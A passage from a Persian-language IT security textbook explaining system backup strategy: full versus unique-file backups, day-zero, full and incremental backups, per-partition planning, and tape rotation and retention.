‫ﻼ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺳﺮﺟﻤﻌﻬﺎﻱ ‪ MD5‬ﻓﺎﻳﻠﻬﺎﻱ ﺷﻤﺎ ﺭﺍ ﺑﺮﺭﺳـﻲ ﻛﻨﻨـﺪ ﻭ ﺗﻨﻬـﺎ ﺍﺯ‬
‫ﺑﻌﻀﻲ ﺍﺯ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺴﻴﺎﺭ ﻣﺎﻫﺮﺍﻧﻪ ﻋﻤﻞ ﻛﻨﻨﺪ‪ .‬ﻣﺜ ﹰ‬
‫ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﻳﻜﺘﺎ ﻫﺴﺘﻨﺪ ﭘﺸﺘﻴﺒﺎﻥ ﺑﮕﻴﺮﻧﺪ‪ .‬ﺩﺭﺍﻳﻨﺼﻮﺭﺕ ﺍﮔﺮ ﺷﻤﺎ ﻫﺰﺍﺭﺍﻥ ﺭﺍﻳﺎﻧﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﺭﻭﻱ ﺗﻤـﺎﻡ ﺁﻧﻬـﺎ ﺑﺮﻧﺎﻣـﻪ ‪Microsoft‬‬
‫‪ Office‬ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺁﻥ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺑﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺿﺎﻓﻪ ﻧﻤﻲﺷﻮﻧﺪ‪.‬‬
‫ﺍﺯ ﭼﻪ ﭼﻴﺰﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﻢ‬
‫ﺩﻭ ﺭﻭﺵ ﻛﻠﻲ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫‪.١‬‬
‫ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﻫﺮﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻣﻨﺤﺼﺮ ﺑﻪ ﻓـﺮﺩ ﺍﺳـﺖ ‪ -‬ﺣـﺴﺎﺑﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ‪ ،‬ﻓﺎﻳﻠﻬـﺎﻱ ﺩﺍﺩﻩ ﻭ ﺷـﺎﺧﻪﻫـﺎﻱ ﻣﻬـﻢ‬
‫ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺧﺘﺼﺎﺻﻲ‪ ١١٨‬ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺷﻴﻮﻩ ﺩﺭ ﻧﻮﺍﺭ ﻳﺎ ﺩﻳﺴﻚ ﺻﺮﻓﻪﺟـﻮﻳﻲ ﻣـﻲﻛﻨـﺪ ﻭ ﺯﻣـﺎﻥ ﺗﻬﻴـﺔ ﻳـﻚ‬
‫ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺭﺍ ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ‪ .‬ﺩﺭﺻﻮﺭﺕ ﺧﺮﺍﺏ ﺷﺪﻥ ﺳﻴﺴﺘﻢ‪ ،‬ﺗﺮﻣﻴﻢ ﺭﺍ ﺍﺑﺘﺪﺍ ﺑﺎ ﻧﺼﺐ ﻣﺠﺪﺩ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺭﺍﻳﺎﻧﻪ ﺧﻮﺩ ﻭ ﺳﭙﺲ‬
‫ﻧﺼﺐ ﻣﺠﺪﺩ ﻫﻤﺔ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺷﺮﻭﻉ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﻭ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﻧﻮﺍﺭﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺧﻮﺩ ﺭﺍ ﺍﺣﻴﺎ ﻣﻲﻧﻤﺎﻳﻴﺪ‪.‬‬
‫‪.٢‬‬
‫ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﺯ ﻫﻤﻪ ﭼﻴﺰ ‪ -‬ﭼﻮﻥ ﺑﺎﺯﺳﺎﺯﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺁﺳﺎﻧﺘﺮ ﺍﺯ ﺗﺮﻣﻴﻢ ﻳﻚ ﺗﻜﻪ ﺍﺯ ﺳﻴﺴﺘﻢ ﺍﺳﺖ؛ ﻭ ﻗﻴﻤﺖ ﻧﻮﺍﺭ ﻫﻢ‬
‫ﺍﺭﺯﺍﻥ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﻋﻤﻮﻣﹰﺎ ﺷﻴﻮﺓ ﺩﻭﻡ ﺑﺎﻳﺪ ﺗﺮﺟﻴﺢ ﺩﺍﺩﻩ ﺷﻮﺩ‪ .‬ﻋﻠﻴﺮﻏﻢ ﺍﻳﻨﻜﻪ ﻗـﺴﻤﺘﻲ ﺍﺯ ﺍﻃﻼﻋـﺎﺗﻲ ﻛـﻪ ﺷـﻤﺎ ﺍﺯ ﺁﻥ ﭘـﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ ﻛـﺮﺩﻩﺍﻳـﺪ ﭘﻴـﺸﺘﺮ ﺭﻭﻱ‬
‫ﺩﻳﺴﻜﻬﺎﻱ ﺍﺻﻠﻲ ﺗﻮﺯﻳﻊ ﺷﺪﻩ ﻳﺎ ﻧﻮﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﺑﺎﺭﮔﺬﺍﺭﻱ ﺳﻴﺴﺘﻢ ﺑﻪ ﺭﻭﻱ ﺩﻳﺴﮏ ﺳﺨﺖ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛـﺮﺩﻩﺍﻳـﺪ ﭘـﺸﺘﻴﺒﺎﻥﮔﻴـﺮﻱ‬
‫ﺷﺪﻩﺍﻧﺪ‪ ،‬ﻭﻟﻲ ﻧﻮﺍﺭﻫﺎ ﻳﺎ ﺩﻳﺴﻜﻬﺎﻱ ﺗﻮﺯﻳﻊ ﻫﻢ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﮔﻢ ﻣﻲﺷﻮﻧﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﻫﻤﻴﻨﻄﻮﺭ ﻛﻪ ﻋﻤﺮ ﺳﻴـﺴﺘﻢ ﺷـﻤﺎ ﺯﻳـﺎﺩ ﻣـﻲﺷـﻮﺩ‪،‬‬
‫ﺑﺮﻧﺎﻣﻪﻫﺎ ﺭﻭﻱ ﺷﺎﺧﻪﻫﺎﻱ ﺭﺯﺭﻭﺷﺪﺓ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻧﺼﺐ ﻣﻲﺷﻮﻧﺪ؛ ﻣﺜﻞ ﺣﻔﺮﻩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻛﻪ ﻛﺸﻒ ﻭ ﺍﺻﻼﺡ ﻣـﻲﺷـﻮﻧﺪ ﻭ ﻳـﺎ ﺗﻐﻴﻴـﺮﺍﺕ‬
‫ﺩﻳﮕﺮﻱ ﻛﻪ ﺭﺥ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺍﮔﺮ ﺗﺎ ﻛﻨﻮﻥ ﻳﻜﺒﺎﺭ ﺳﻌﻲ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺑﻌﺪ ﺍﺯ ﻭﻗﻮﻉ ﻳﻚ ﺧﺮﺍﺑﻲ ﺑﺎﺯﺳـﺎﺯﻱ ﻛﻨﻴـﺪ‪ ،‬ﻣـﻲﺩﺍﻧﻴـﺪ ﺍﮔـﺮ‬
‫ﻫﺮﭼﻴﺰﻱ ﺳﺮ ﺟﺎﻱ ﺧﻮﺩ ﺑﺎﺷﺪ ﺭﻭﻧﺪ ﺍﻧﺠﺎﻡ ﻛﺎﺭ ﭼﻘﺪﺭ ﺳﺎﺩﻩﺗﺮ ﺍﺳﺖ‪.‬‬
‫ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﻫﻤﻪ ﭼﻴﺰ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ )ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﺎ ﻛﻪ ﻫﺮﭼﻴﺰﻱ ﻛﻪ ﺑﺮﺍﻱ ﻧﺼﺐ ﻣﺠـﺪﺩ ﺳﻴـﺴﺘﻢ ﻧﻴـﺎﺯ ﺍﺳـﺖ ‪ -‬ﺍﺯ ﺟﻤﻠـﻪ ﻫﻤـﺔ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﻧﻬﺎﻳﻲ ﺭﺍ( ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺩﺭ ﺑﺎﺯﻩﻫﺎﻱ ﻣﻌﻴﻦ ﺯﻣﺎﻧﻲ ﺭﻭﻱ ﺭﺳﺎﻧﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺫﺧﻴﺮﻩ ﻛﻨﻴﺪ‪ .‬ﻃﻮﻝ ﺍﻳﻦ ﺑﺎﺯﻩ ﺯﻣـﺎﻧﻲ ﺑـﻪ ﺳـﺮﻋﺖ ﺗﺠﻬﻴـﺰﺍﺕ‬
‫ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮ ﺷﻤﺎ ﻭ ﻣﻴﺰﺍﻥ ﻓﻀﺎﻱ ﺣﺎﻓﻈﺔ ﺍﺧﺘﺼﺎﺹ ﺩﺍﺩﻩ ﺷﺪﻩ ﺑﻪ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎ ﻭ ﻫﻤﭽﻨـﻴﻦ ﻧﻴﺎﺯﻫـﺎﻱ ﺳـﺎﺯﻣﺎﻥ ﺷـﻤﺎ ﺑـﺴﺘﮕﻲ ﺩﺍﺭﺩ‪ .‬ﺷـﺎﻳﺪ‬
‫ﺑﺨﻮﺍﻫﻴﺪ ﻫﻔﺘﻪﺍﻱ ﻳﻜﺒﺎﺭ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﺗﻬﻴﻪ ﻛﻨﻴﺪ‪ ،‬ﻭ ﻳﺎ ﺷﺎﻳﺪ ﺑﺨﻮﺍﻫﻴﺪ ﺗﻨﻬﺎ ﺩﻭ ﺑﺎﺭ ﺩﺭ ﺳﺎﻝ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪.‬‬
‫ﺍﻧﻮﺍﻉ ﭘﺸﺘﻴﺒﺎﻥﻫﺎ‬
‫ﺳﻪ ﻧﻮﻉ ﻛﻠﻲ ﭘﺸﺘﻴﺒﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ :‬ﭘﺸﺘﻴﺒﺎﻥ ﺳﻄﺢ ﺻﻔﺮ )ﺭﻭﺯ ﺻﻔﺮ(‪ ،‬ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ‪ ،‬ﻭ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ‪.‬‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﺳﻄﺢ ﺻﻔﺮ )ﺭﻭﺯ ﺻﻔﺮ(‬
‫ﺍﺯ ﺳﻴﺴﺘﻢ ﺍﺻﻠﻲ ﺷﻤﺎ ﻳﻚ ﻛﭙﻲ ﺗﻬﻴﻪ ﻣﻲﻛﻨﺪ‪ .‬ﻭﻗﺘﻲ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺑﺮﺍﻱ ﺑﺎﺭ ﺍﻭﻝ ﻧﺼﺐ ﻣﻲﺷﻮﺩ‪ ،‬ﭘﻴﺶ ﺍﺯ ﺁﻧﻜﻪ ﺍﻓﺮﺍﺩ ﺷﺮﻭﻉ ﺑـﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺁﻥ ﺑﻜﻨﻨﺪ‪ ،‬ﺍﺯ ﻫﺮ ﻓﺎﻳﻞ ﻭ ﺑﺮﻧﺎﻣﻪ ﺩﺭ ﺳﻴﺴﺘﻢ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﺍﻳﻦ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺑﻌﺪ ﺍﺯ ﻳﻚ ﻧﻔﻮﺫ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﺍﻧﺠـﺎﻡ‬
‫ﻼ ﺑﻲﺍﺭﺯﺵ ﺑﺎﺷﺪ‪.‬‬
‫ﺷﻮﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﻛﺎﻣ ﹰ‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ‬
‫ﺍﺯ ﻫﺮ ﻓﺎﻳﻞ ﺭﺍﻳﺎﻧﻪ ﻳﻚ ﻛﭙﻲ ﺭﻭﻱ ﭘﺸﺘﻴﺒﺎﻥ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ‪ .‬ﺍﻳﻦ ﺭﻭﺵ ﻣﺸﺎﺑﻪ "ﭘﺸﺘﻴﺒﺎﻥ ﺭﻭﺯ ﺻﻔﺮ" ﺍﺳﺖ‪ ،‬ﺟﺰ ﺍﻳﻨﻜﻪ ﻫـﺮ ﺍﺯ ﭼﻨـﺪﮔﺎﻩ ﺍﻧﺠـﺎﻡ‬
‫ﻣﻲﺷﻮﺩ‪.‬‬
‫‪118 Customized‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫‪٣٠٩‬‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ‬
‫ﺗﻨﻬﺎ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻣﻲﺷﻮﺩ ﻛﻪ ﺑﻌﺪ ﺍﺯ ﻳﻚ ﺍﺗﻔﺎﻕ ﺧﺎﺹ )ﻣﺜﻞ ﺍﺻﻼﺡ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﺩﺍﺭﺍﻱ ﺿﻌﻒ( ﻳﺎ ﺗﺎﺭﻳﺦ ﺧﺎﺹ )ﻣﺜﻞ ﺗﺎﺭﻳﺦ ﺗﻬﻴـﺔ‬
‫ﻻ ﺩﺭ ﻛﻨﺎﺭ ﻫﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﺍﻣـﺮﻭﺯﻩ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺭﺍﻳـﺞ‬
‫ﺁﺧﺮﻳﻦ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ( ﺗﻐﻴﻴﺮ ﻛﺮﺩﻩﺍﻧﺪ‪ .‬ﺍﺯ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﻭ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ ﻣﻌﻤﻮ ﹰ‬
‫ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺑﺸﺮﺡ ﺯﻳﺮ ﺍﺳﺖ‪:‬‬
‫•‬
‫•‬
‫ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﺩﺭ ﺍﻭﻟﻴﻦ ﺭﻭﺯ ﻫﻔﺘﻪ ﺑﺼﻮﺭﺕ ﻳﻚ ﻫﻔﺘﻪ ﺩﺭ ﻣﻴﺎﻥ؛ ﻭ‬
‫ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ ﺩﺭ ﭘﺎﻳﺎﻥ ﻫﺮ ﺍﺗﻔﺎﻗﻲ ﻛﻪ ﭘﺲ ﺍﺯ ﺗﻬﻴﺔ ﺁﺧﺮﻳﻦ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﺩﺭ ﺳﻴﺴﺘﻢ ﻣﻲﺍﻓﺘﺪ‪ .‬ﺍﻳﻦ ﻧﻮﻉ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ‬
‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺁﻧﺪﺳﺘﻪ ﻓﺎﻳﻠﻬﺎﻳﻲ ﺭﺍ ﺑﺎﻳﮕﺎﻧﻲ ﻣﻲﻛﻨﺪ ﻛﻪ ﺍﺯ ﺯﻣﺎﻥ ﺗﻬﻴﻪ ﺁﺧﺮﻳﻦ ﭘﺸﺘﻴﺒﺎﻥ ﻛﺎﻣﻞ ﺗﻐﻴﻴﺮ ﻛـﺮﺩﻩﺍﻧـﺪ‪ ،‬ﮔـﺎﻫﻲ ﺍﻭﻗـﺎﺕ ﭘـﺸﺘﻴﺒﺎﻥ‬
‫ﺗﻔﺎﻭﺗﻲ‪ ١١٩‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺍﻛﺜﺮ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺑﺰﺭﮒ ﺗﻬﻴﺔ ﭘـﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﺮ ﺍﺳـﺎﺱ ‪ partition‬ﻳـﺎ ﺩﻳـﺴﻚﮔـﺮﺩﺍﻥ ﻃﺮﺍﺣـﻲ ﻭ ﺫﺧﻴـﺮﻩ ﻣـﻲﻛﻨﻨـﺪ‪.‬‬
‫ﻻ ﺑﻪ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﺨﺘﻠﻒ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ‪ .‬ﺑﺮ ﺍﺳﺎﺱ ﺍﻳـﻦ ﻧﻈﺮﻳـﻪ ﻛـﻪ ﻫـﺮ ﺗﻐﻴﻴـﺮﻱ ﻛـﻪ ﺷـﻤﺎ‬
‫‪partition‬ﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﻲﺩﻫﻴﺪ ﺑﺴﻴﺎﺭ ﭘﺮ ﺍﻫﻤﻴﺖ ﺍﺳﺖ‪ ،‬ﺑﺮﺧﻲ ﺍﺯ ‪partition‬ﻫﺎ ﻣﺜﻞ ‪ partition‬ﺳﻴﺴﺘﻢ ﺷﻤﺎ )ﺍﮔﺮ ﺍﺯ ﻫﻢ ﺟﺪﺍ ﺑﺎﺷﻨﺪ( ﻗﺎﻋﺪﺗﹰﺎ ﺑﺎﻳﺪ ﻫﺮ ﺯﻣـﺎﻥ ﻛـﻪ ﺩﺭ‬
‫ﺁﻧﻬﺎ ﺗﻐﻴﻴﺮ ﺍﻳﺠﺎﺩ ﻣﻲﺷﻮﺩ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺷﻮﻧﺪ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺑﺠﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ ﺑﺎﻳﺪ ﺍﺯ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﻛﺎﻣـﻞ ﺑﻬـﺮﻩ ﺑـﺮﺩ‪ ،‬ﺯﻳـﺮﺍ‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﺁﻧﻬﺎ ﻓﻘﻂ ﺩﺭﺻﻮﺭﺕ ﻛﺎﻣﻞ ﺑﻮﺩﻥ ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺳﺖ‪ .‬ﻫﻤﻴﻨﻄﻮﺭ ﺑﺨﺸﻬﺎﻳﻲ ﻛﻪ ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﺫﺧﻴـﺮﻩ ﻛـﺮﺩﻥ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ ﺗﻨﻬﺎ ﻫﻨﮕﺎﻣﻲ ﺑﻪ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺟﺪﻳﺪ ﻧﺼﺐ ﺷﻮﻧﺪ ﻭ ﻳﺎ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﻣﻮﺟـﻮﺩ ﺗﻐﻴﻴـﺮ‬
‫ﻛﻨﻨﺪ‪.‬‬
‫ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱﻫﺎﻱ ﺍﻓﺰﺍﻳﺸﻲ ﺑﺮﺍﻱ ‪partition‬ﻫﺎﻳﻲ ﻛﻪ ﺟﻬﺖ ﺫﺧﻴﺮﺓ ﻓﺎﻳﻠﻬﺎﻱ ﻛﺎﺭﺑﺮ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻣﻨﺎﺳﺒﺘﺮ‬
‫ﺍﺳﺖ؛ ﺍﻣﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﺑﺨﻮﺍﻫﻴﺪ ﻣﻜﺮﺭﹰﺍ ﺍﺯ ﺍﻳﻦ ﻧﻮﻉ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺗﺎ ﺩﺭﺻﻮﺭﺕ ﻭﻗﻮﻉ ﺧﺮﺍﺑﻲ‪ ،‬ﻣﻘﺪﺍﺭ ﻛـﺎﺭﻱ ﻛـﻪ ﺍﻣﻜـﺎﻥ‬
‫ﺩﺍﺭﺩ ﺍﺯ ﺩﺳﺖ ﺑﺪﻫﻴﺪ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻩ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﻫﻨﮕﺎﻣﻴﻜﻪ ﭘﺸﺘﻴﺒﺎﻧﻴﻬﺎﻱ ﺍﻓﺰﺍﻳﺸﻲ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﻴﺪ‪ ،‬ﺍﺯ ﻳﻚ ﻣﺠﻤﻮﻋﻪ ﻧﻮﺍﺭﻫﺎ ﻳﺎ ﺩﻳﺴﻜﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺑﺼﻮﺭﺕ ﭼﺮﺧﺸﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ‪.‬‬
‫ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺍﻣﺸﺐ ﻧﺒﺎﻳﺪ ﺑﺮ ﺭﻭﻱ ﻧﻮﺍﺭﻱ ﻛﻪ ﺑﺮﺍﻱ ﻧﺴﺨﻪ ﭘﺸﺘﻴﺒﺎﻥ ﺷﺐ ﮔﺬﺷﺘﻪ ﺍﺯ ﺁﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﺷـﺪﻩ ﻧﻮﺷـﺘﻪ ﺷـﻮﺩ‪ .‬ﺩﺭ ﻏﻴﺮﺍﻳﻨـﺼﻮﺭﺕ‬
‫ﭼﻨﺎﻧﭽﻪ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﺍﻭﺍﺳﻂ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﻣﺸﺐ ﺧﺮﺍﺏ ﺷﻮﺩ‪ ،‬ﺷﻤﺎ ﻫﻤﺔ ﺩﺍﺩﻩﻫﺎﻱ ﺭﻭﻱ ﺩﻳﺴﻚ ﺭﺍ ﺍﺯ ﺩﺳﺖ ﺧﻮﺍﻫﻴﺪ ﺩﺍﺩ‪ :‬ﺩﺍﺩﻩﻫﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ‬
‫ﺍﻣﺸﺐ )ﭼﻮﻥ ﻧﺎﻗﺺ ﺍﺳﺖ(‪ ،‬ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺷﺐ ﮔﺬﺷﺘﻪ )ﭼﻮﻥ ﻗﺴﻤﺘﻲ ﺍﺯ ﺁﻥ ﺑﻮﺳـﻴﻠﻪ ﭘـﺸﺘﻴﺒﺎﻥ ﺍﻣـﺸﺐ ﺟـﺎﻳﮕﺰﻳﻦ ﺷـﺪﻩ ﺍﺳـﺖ(‪ .‬ﺑﻄـﻮﺭ ﺍﻳـﺪﻩﺁﻝ‬
‫ﺐ ﻫﻔﺘﻪ ﻳﻚ ﻧﻮﺍﺭ ﻣﺠﺰﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪.‬‬
‫ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﺍﻓﺰﺍﻳﺸﻲ ﺭﺍ ﺷﺒﻲ ﻳﻜﺒﺎﺭ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪ ،‬ﻭ ﺑﺮﺍﻱ ﻫﺮ ﺷ ﹺ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﻳﻚ ﻫﻔﺘﻪ ﻳﺎ ﻳﻚ ﻣﺎﻩ ﻃﻮﻝ ﺑﻜﺸﺪ ﺗﺎ ﻣﺘﻮﺟﻪ ﺷﻮﻳﺪ ﻛﻪ ﻳﻚ ﻓﺎﻳﻞ ﺣﺬﻑ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﺷـﻤﺎ ﺑﺎﻳـﺪ ﺑﻌـﻀﻲ ﺍﺯ ﻧﻮﺍﺭﻫـﺎﻱ‬
‫ﭘﺸﺘﻴﺒﺎﻥ ﺭﺍ ﺑﻤﺪﺕ ﻳﻜﻬﻔﺘﻪ‪ ،‬ﺑﻌﻀﻲ ﺭﺍ ﻳﻜﻤﺎﻩ‪ ،‬ﻭ ﺑﻌﻀﻲ ﺭﺍ ﭼﻨﺪﻳﻦ ﻣﺎﻩ ﻧﮕﻬﺪﺍﺭﻱ ﻛﻨﻴﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺳﺎﻻﻧﻪ ﻳﺎ ‪ ۳‬ﻣﺎﻫـﺔ‬
‫ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻫﻤﻴﺸﻪ ﺁﺭﺷﻴﻮ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﻌﻀﻲ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻧﻴﺰ ﭘﺸﺘﻴﺒﺎﻧﻬﺎﻱ ﺳﺎﻻﻧﻪ ﻳﺎ ﺩﻭﺳﺎﻻﻧﺔ ﺧﻮﺩ ﺭﺍ ﺑﺮﺍﻱ ﻫﻤﻴﺸﻪ ﻧﮕﻬـﺪﺍﺭﻱ ﻣـﻲﻛﻨﻨـﺪ‪،‬‬
‫ﭼﺮﺍﮐﻪ ﺑﻪ ﻫﺮﺣﺎﻝ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺩﺭ ﻣﻘﺎﺑﻞ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻛﻪ ﺁﻧﻬﺎ ﺭﻭﺯﻱ ﺑﻜﺎﺭ ﺁﻳﻨﺪ ﺳﺮﻣﺎﻳﻪﮔﺬﺍﺭﻱ ﺍﻧـﺪﻛﻲ ﺑـﻪ ﺣـﺴﺎﺏ ﻣـﻲﺁﻳـﺪ‪ .‬ﺩﺭ ﺑﻌـﻀﻲ ﺍﺯ‬
